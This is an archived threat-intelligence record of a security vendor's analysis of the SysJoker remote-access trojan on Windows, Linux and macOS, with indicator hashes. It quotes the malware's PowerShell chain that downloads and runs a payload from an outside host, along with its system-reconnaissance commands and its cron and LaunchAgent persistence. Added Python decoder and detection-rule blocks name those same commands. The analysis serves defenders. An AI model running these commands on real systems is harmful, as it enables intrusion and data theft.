{
	"id": "ce86134c-fba4-47db-a6f0-c683f9e66370",
	"created_at": "2026-04-06T00:09:27.158388Z",
	"updated_at": "2026-04-10T03:24:18.292365Z",
	"deleted_at": null,
	"sha1_hash": "18a79e3359e37d480b181e6658e95734a1fe44c4",
	"title": "SysJoker – An Analysis of a Multi-OS RAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5116001,
	"plain_text": "SysJoker – An Analysis of a Multi-OS RAT\r\nBy Threat Analysis Unit\r\nPublished: 2022-03-23 · Archived: 2026-04-05 14:54:24 UTC\r\nThis article was written by Sagar Daundkar.\r\nSummary \r\nSysJoker RAT is cross-platform malware that targets the Windows, Linux and macOS operating systems. Being cross-platform lets the malware authors infect victims on all major platforms from one shared code base. SysJoker can execute commands remotely as well as download and execute new malware on victim machines. The major functionality is the same on all three platforms because the code is shared. In this post we look at how the malware differs between the operating system versions. \r\nWindows Version \r\nFor the Windows version of SysJoker, the first stage is a DLL that downloads the main SysJoker RAT payload. The DLL uses PowerShell commands to download a zip file from a URL, unzip it, and execute the final payload. The detailed behavior is as follows: \r\nIt first creates the directory “C:\\ProgramData\\RecoverySystem”, then executes PowerShell to download a zip containing the final payload msg.exe from https://github.url-mini.com/msg.zip (a github-named subdomain of url-mini.com, not GitHub itself): \r\n“powershell.exe Invoke-WebRequest -Uri ‘https://github.url-mini.com/msg.zip’ -OutFile ‘C:\\ProgramData\\RecoverySystem\\recoveryWindows.zip’;Write-Output “Time taken : $((Get-Date).Subtract($start_time).Seconds) second(s)”” \r\nIt then extracts the downloaded recoveryWindows.zip into the same directory with the PowerShell command: \r\n“powershell.exe Expand-Archive -LiteralPath ‘C:\\ProgramData\\RecoverySystem\\recoveryWindows.zip’ -DestinationPath ‘C:\\ProgramData\\RecoverySystem'” \r\nFinally it launches the extracted msg.exe: \r\n“powershell.exe start C:\\ProgramData\\RecoverySystem\\msg.exe” \r\nmsg.exe sleeps multiple times to evade security products, a common way to outlast sandbox analysis timeouts. 
It copies itself to “C:\\ProgramData\\SystemData\\igfxCUIService.exe”, a name that mimics the legitimate Intel graphics control panel service binary, with the PowerShell command: \r\n“powershell.exe copy C:\\ProgramData\\RecoverySystem\\msg.exe C:\\ProgramData\\SystemData\\igfxCUIService.exe” \r\nThe malware then executes igfxCUIService.exe to begin the RAT activity. \r\nhttps://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html\r\nPage 1 of 12\n\nFigure 1. Code for executing the final RAT. \r\nThe final payload decodes the encoded responses from the C2 by applying Base64 decoding and then XOR decryption. It first decrypts a Google Drive URL that points to an encrypted file used to determine the C2 internet address. \r\nFigure 2. Code for decrypting the GDrive URL \r\nNext, the malware runs several command lines to collect system information, which it stores in temporary text files. The collected information includes the network MAC address, hard drive serial number, current user name, OS information, and the IP address: 
\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe getmac | Out-File -Encoding Default C:\\ProgramData\\SystemData\\temps1.txt ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding Default C:\\ProgramData\\SystemData\\temps2.txt \r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $env:username | Out-File -Encoding Default C:\\ProgramData\\SystemData\\tempu.txt \r\nC:\\Windows\\System32\\cmd.exe /c wmic OS get Caption, CSDVersion, OSArchitecture, Version /value \u003e C:\\ProgramData\\SystemData\\tempo1.txt \u0026\u0026 type C:\\ProgramData\\SystemData\\tempo1.txt \u003e C:\\ProgramData\\SystemData\\tempo2.txt \r\nC:\\Windows\\System32\\cmd.exe /c wmic nicconfig where “IPEnabled = True” get ipaddress \u003e C:\\ProgramData\\SystemData\\tempi1.txt \u0026\u0026 type C:\\ProgramData\\SystemData\\tempi1.txt \u003e C:\\ProgramData\\SystemData\\tempi2.txt \r\nAfter these commands have run, the malware builds a JSON object from the temporary text files and encrypts it with XOR. The encrypted data is then Base64 encoded and stored in the newly created file “C:\\ProgramData\\SystemData\\microsoft_Windows.dll”, which holds this encoded data rather than a loadable library. The plain-text JSON object is shown in Figure 3. \r\nFigure 3. JSON object for machine information before encryption \r\nSysJoker sends this collected machine information to the C2 server as its initial beacon. After registering with the C2, it waits for the threat actor to send commands to execute, and reports each command's result whether or not the command succeeded. 
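The Base64-then-XOR scheme used for the C2 responses above, and in reverse for the beacon written to microsoft_Windows.dll, is simple enough to reproduce for triage. The Python below is an added example, not code from the original post or from the malware itself: it implements that pipeline as an encoder/decoder pair with a hypothetical key (SysJoker's real XOR key is not reproduced here and must be taken from a sample) and a constructed machine-info record using the fields the article names, so that a captured beacon or response can be decoded offline once the real key is recovered.

```python
import base64
import json

# Hypothetical key for illustration; the real SysJoker XOR key is not
# reproduced here and must be recovered from a sample.
DEMO_KEY = b'sysjoker-demo-key'


def xor_bytes(data: bytes, key: bytes) -> bytes:
    # Repeating-key XOR; symmetric, so the same call encrypts and decrypts.
    if not key:
        raise ValueError('key must not be empty')
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_message(plaintext: bytes, key: bytes = DEMO_KEY) -> str:
    # Sender side: XOR first, then Base64 (the order the RAT reverses).
    return base64.b64encode(xor_bytes(plaintext, key)).decode('ascii')


def decode_message(b64text: str, key: bytes = DEMO_KEY) -> bytes:
    # Receiver side, as the RAT does it: Base64 decode, then XOR.
    # validate=True rejects input that is not Base64 instead of silently
    # dropping characters, which matters when carving data out of a file.
    raw = base64.b64decode(b64text.strip(), validate=True)
    return xor_bytes(raw, key)


def build_beacon(mac, serial, user, os_info, ip, key=DEMO_KEY) -> str:
    # Constructed record with the fields the article says SysJoker collects;
    # the real JSON field names are not reproduced on the page.
    info = {'mac': mac, 'serial': serial, 'user': user,
            'os': os_info, 'ip': ip}
    return encode_message(json.dumps(info, sort_keys=True).encode(), key)


def parse_beacon(b64text: str, key=DEMO_KEY) -> dict:
    # Inverse of build_beacon: decode the wire form back into the record.
    return json.loads(decode_message(b64text, key).decode())


if __name__ == '__main__':
    beacon = build_beacon('00-11-22-33-44-55', 'WD-WX1234', 'alice',
                          'Microsoft Windows 10 Pro 10.0.19044', '10.0.0.7')
    print(beacon)
    print(parse_beacon(beacon))
```

To use this against a real microsoft_Windows.dll or a captured C2 response, replace DEMO_KEY with the key extracted from the decryption routine in Figure 2 and pass the file contents to decode_message; a wrong key yields bytes that fail to parse as JSON rather than an error from the decoder.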
SysJoker supports receiving four commands from the C2, though notably not all of them are functional: \r\ncmd \r\nexe \r\nremove_reg \r\nexit\r\n“cmd” command \r\nUpon receiving a “cmd” network packet, the RAT parses out the embedded command line sent by the threat actor and executes it with cmd.exe, as shown in Figure 4. It redirects the output of the executed command to a file named “C:\\ProgramData\\SystemData\\txc1.txt”, which is then encoded and transmitted to the C2. It supports almost any command that can be executed with cmd.exe. \r\nFigure 4. Code for processing the cmd command \r\n“exe” command \r\nUpon receiving an “exe” network packet, the RAT parses multiple components out of the data, including an embedded URL. The URL is used to download a file and place it in the specified directory. Once downloaded, the file is executed. \r\nFigure 5. Code for processing the exe command \r\n“remove_reg” and “exit” commands \r\nTwo more commands were found in the code: remove_reg and exit. However, these commands were not fully functional in the samples analyzed. \r\nFigure 6. Parsing of the remove_reg and exit commands\r\nLinux Version\r\nThe Linux version of SysJoker behaves much like the Windows version, from the collection of system information and the string decryption logic to the supported commands. The XOR decryption key is similar in both operating system versions. \r\nPersistence: \r\nThe malware first creates persistence with a cron job. 
The job is set to execute a copy of the malware stored at “/home/$username/.Library/SystemServices/updateSystem”, as shown in Figure 7. \r\nFigure 7. Terminal log of the malware creating the cron job. \r\nThe malware uses the code shown in Figure 8 to create the cron job with the Linux crontab command.\r\nFigure 8. Code for creating the cron job that runs on reboot \r\nIf the “updateSystem” file is already present in “/home/$username/.Library/SystemServices” and a process named “updateSystem” is running, the malware kills that process and replaces the updateSystem file with a copy of itself: \r\npkill updateSystem\r\ncp -rf ‘.’ ‘/home/username/.Library/SystemServices/updateSystem’ \r\nThe code shown in Figure 9 forms and executes the above commands: \r\nFigure 9. Code for killing the updateSystem process \r\nIt then executes ‘updateSystem’ with the command: \r\nnohup ‘/home/username/.Library/SystemServices/updateSystem’ \u003e/dev/null 2\u003e\u00261 \r\nThe updateSystem process reads a text file hosted on a Google Drive account to obtain the final C2 URL. The response is Base64 decoded and then decrypted with the XOR key, as shown in the figure below. \r\nFigure 8. Code used to encrypt the response before sending \r\nSysJoker transmits the collected machine information to the C2 server and awaits further commands. These commands arrive in a similar packet structure, XOR encrypted and Base64 encoded. \r\nLike the Windows version, the Linux variant has only a minimal set of commands built in. 
Below are the commands supported by the RAT: \r\ncmd command \r\nUpon receiving a “cmd” network packet, the RAT parses out the embedded command line sent by the threat actor and executes it directly, as shown in Figure 9. The output of the command is then encrypted and sent to the C2 server. \r\nFigure 9. Code for processing the cmd command \r\nexe command \r\nUpon receiving an “exe” network packet, the RAT parses multiple components out of the data, including an embedded URL. The URL is used to download a file and place it in the specified directory. The downloaded file is expected to be a ZIP archive, which is unzipped to an executable file. The malware marks the file executable and then launches it, as shown in Figure 10. \r\nFigure 10. Code for processing the exe command \r\nOnce complete, the malware sends a basic response to the C2, as shown in Figure 11. \r\nFigure 11. Response sent after execution of the exe command \r\nmacOS Version \r\nThe macOS version of the malware has many similarities to the other versions. The malware has been seen running under the filename types-config.ts and copied to “/Library/MacOsServices/updateMacOs”. From the strings found in the malware we can get a basic understanding of its functionality, as shown in Figure 12. \r\nFigure 12. Strings from the macOS version of the RAT \r\nPersistence \r\nThe malware persists on the system with a LaunchAgent named “Apple launch service” that targets “/Library/MacOsServices/updateMacOs”. \r\nThe other functionality is almost identical to the Linux version, including C2 communications, commands, and responses. 
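The staging and persistence artifacts described for the three platforms (the PowerShell download/unzip/copy chain and the temp*.txt recon files on Windows, the crontab entry and the pkill/cp/nohup sequence on Linux, the LaunchAgent on macOS) can be turned directly into host-side detection logic. The Python below is an added example, not code from the original post: it runs a small rule set over constructed sample records (Sysmon-style process command lines, crontab lines and a LaunchAgent plist fragment) and returns the rule hits per platform. The record kinds, rule names and sample lines are constructed for illustration; the paths and command fragments the rules look for are the ones the article reports. The @reboot form of the cron entry is an assumption based on the Figure 8 caption, since the page does not show the crontab line itself.

```python
import re

BS = chr(92)  # a backslash, built at runtime so the snippet needs no escapes


def norm(text: str) -> str:
    # Case-fold and turn Windows backslash separators into '/', so one
    # pattern covers C:/ProgramData and c:/programdata spellings alike.
    return text.replace(BS, '/').lower()


# (rule name, platform, record kinds it applies to, pattern over norm(text)).
# Paths and command fragments are those reported for SysJoker in the
# article; the patterns themselves are ours and deliberately narrow.
RULES = [
    ('win_stage1_download', 'windows', ('process',),
     r'invoke-webrequest.*-outfile.*c:/programdata/recoverysystem/'),
    ('win_stage1_unzip', 'windows', ('process',),
     r'expand-archive.*c:/programdata/recoverysystem/'),
    ('win_copy_to_fake_igfx', 'windows', ('process',),
     r'copy .*c:/programdata/systemdata/igfxcuiservice[.]exe'),
    ('win_recon_tempfiles', 'windows', ('process',),
     r'(getmac|wmic .*(serialnumber|nicconfig|os get)|[$]env:username)'
     r'.*c:/programdata/systemdata/temp[a-z]?[0-9]?[.]txt'),
    ('win_cmd_output_file', 'windows', ('process',),
     r'c:/programdata/systemdata/txc1[.]txt'),
    ('linux_cron_updatesystem', 'linux', ('crontab',),
     r'/[.]library/systemservices/updatesystem'),
    ('linux_kill_or_launch_updatesystem', 'linux', ('process',),
     r'(pkill updatesystem|nohup .*/[.]library/systemservices/updatesystem)'),
    ('macos_launchagent_updatemacos', 'macos', ('process', 'plist'),
     r'/library/macosservices/updatemacos'),
]
COMPILED = [(n, p, k, re.compile(rx)) for n, p, k, rx in RULES]


def scan(records):
    # records: iterable of (kind, text) with kind in process/crontab/plist.
    # Returns one (rule, platform, original text) tuple per match.
    hits = []
    for kind, text in records:
        t = norm(text)
        for name, platform, kinds, rx in COMPILED:
            if kind in kinds and rx.search(t):
                hits.append((name, platform, text))
    return hits


def by_platform(hits):
    # Summarise hits as {platform: count} for a quick triage view.
    counts = {}
    for _, platform, _ in hits:
        counts[platform] = counts.get(platform, 0) + 1
    return counts


def wp(path: str) -> str:
    # Build a Windows path with real backslashes from a '/'-spelled one.
    return path.replace('/', BS)


def demo_records():
    # Constructed telemetry in the shape the article describes; not real
    # logs from an infected host. Two benign lines are included as controls.
    return [
        ('process', 'powershell.exe Invoke-WebRequest -Uri https://github.url-mini.com/msg.zip -OutFile '
                    + wp('C:/ProgramData/RecoverySystem/recoveryWindows.zip')),
        ('process', 'powershell.exe Expand-Archive -LiteralPath '
                    + wp('C:/ProgramData/RecoverySystem/recoveryWindows.zip')
                    + ' -DestinationPath ' + wp('C:/ProgramData/RecoverySystem')),
        ('process', 'powershell.exe copy ' + wp('C:/ProgramData/RecoverySystem/msg.exe')
                    + ' ' + wp('C:/ProgramData/SystemData/igfxCUIService.exe')),
        ('process', wp('C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe')
                    + ' getmac | Out-File -Encoding Default '
                    + wp('C:/ProgramData/SystemData/temps1.txt')),
        ('process', 'powershell.exe Expand-Archive -LiteralPath '
                    + wp('C:/Users/bob/Downloads/report.zip')
                    + ' -DestinationPath ' + wp('C:/Users/bob/Downloads')),   # benign control
        ('crontab', '@reboot /home/bob/.Library/SystemServices/updateSystem'),  # assumed form
        ('crontab', '0 3 * * * /usr/bin/apt-get update'),                     # benign control
        ('process', 'pkill updateSystem'),
        ('process', 'nohup /home/bob/.Library/SystemServices/updateSystem >/dev/null 2>&1'),
        ('plist', '<string>/Library/MacOsServices/updateMacOs</string>'),
    ]


if __name__ == '__main__':
    found = scan(demo_records())
    for rule, platform, text in found:
        print(platform, rule, '<-', text)
    print(by_platform(found))
```

The rules key on the fixed paths the malware uses rather than on the hashes in Table 1, so they survive a recompiled sample; the cost is that an operator who changes the directory names defeats them, which is why the Windows rules also tie the PowerShell verbs to the ProgramData locations rather than matching either alone.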
\r\nIndicators of Compromise (IOCs) \r\nIndicator  Type  Context \r\n61df74731fbe1eafb2eb987f20e5226962eeceef010164e41ea6c4494a4010fc  SHA256  SysJoker Downloader DLL \r\nd476ca89674c987ca399a97f2d635fe30a6ba81c95f93e8320a5f979a0563517  SHA256  SysJoker Downloader DLL \r\n36fed8ab1bf473714d6886b8dcfbcaa200a72997d50ea0225a90c28306b7670e  SHA256  SysJoker RAT \r\n1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c  SHA256  SysJoker RAT \r\n1a9a5c797777f37463b44de2b49a7f95abca786db3977dcdac0f79da739c08ac  SHA256  OSX SysJoker RAT \r\nfe99db3268e058e1204aff679e0726dc77fd45d06757a5fda9eafc6a28cfb8df  SHA256  OSX SysJoker RAT \r\nd0febda3a3d2d68b0374c26784198dc4309dbe4a8978e44bb7584fd832c325f0  SHA256  OSX SysJoker RAT \r\nbd0141e88a0d56b508bc52db4dab68a49b6027a486e4d9514ec0db006fe71eed  SHA256  ELF SysJoker \r\nd028e64bf4ec97dfd655ccd1157a5b96515d461a710231ac8a529d7bdb936ff3  SHA256  ELF SysJoker \r\nd1d5158660cdc9e05ed0207ceba2033aa7736ed1  SHA1  SysJoker Downloader DLL \r\n888226b749b3fa93dadf5d7c2acf32c71e3a0918  SHA1  SysJoker Downloader DLL \r\n1e894ddc237b033b5b1dcf9b05d281ff0a053532  SHA1  SysJoker RAT \r\nfad66bdf5c5dc2c050cbc574832c6995dba086a0  SHA1  SysJoker RAT \r\n554aef8bf44e7fa941e1190e41c8770e90f07254  SHA1  OSX SysJoker RAT \r\nf5149543014e5b1bd7030711fd5c7d2a4bef0c2f  SHA1  OSX SysJoker RAT \r\n01d06375cf4042f4e36467078530c776a28cec05  SHA1  OSX SysJoker RAT \r\n23c56da0cdddc664980705c4d14cb2579a970eed  SHA1  ELF SysJoker \r\nb21ba8da278b75e1cc515b6e2c84b91be6611800  SHA1  ELF SysJoker \r\nd71e1a6ee83221f1ac7ed870bc272f01  MD5  SysJoker Downloader DLL \r\n293f116c2c51473ae2bf7f4e787d3ec3  MD5  SysJoker Downloader DLL \r\n9a7f0b64007cedfa9ae20dd212892d73  MD5  SysJoker RAT 
\r\nd90d0f4d6dad402b5d025987030cc87c  MD5  SysJoker RAT \r\ne06e06752509f9cd8bc85aa1aa24dba2  MD5  OSX SysJoker RAT \r\n6fb483e7ec55f8c56849d8f4f31bfd7b  MD5  OSX SysJoker RAT \r\n85dbbaa8c4d37ebb9829464f0510787b  MD5  OSX SysJoker RAT \r\n5e11432c30783b184dc2bf27aa1728b4  MD5  ELF SysJoker \r\nc805649d6909bf1d7e220f144801044b  MD5  ELF SysJoker \r\nTable 1. Indicators of Compromise (IOCs) \r\nSource: https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html"
	],
	"report_names": [
		"%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434167,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/18a79e3359e37d480b181e6658e95734a1fe44c4.pdf",
		"text": "https://archive.orkl.eu/18a79e3359e37d480b181e6658e95734a1fe44c4.txt",
		"img": "https://archive.orkl.eu/18a79e3359e37d480b181e6658e95734a1fe44c4.jpg"
	}
}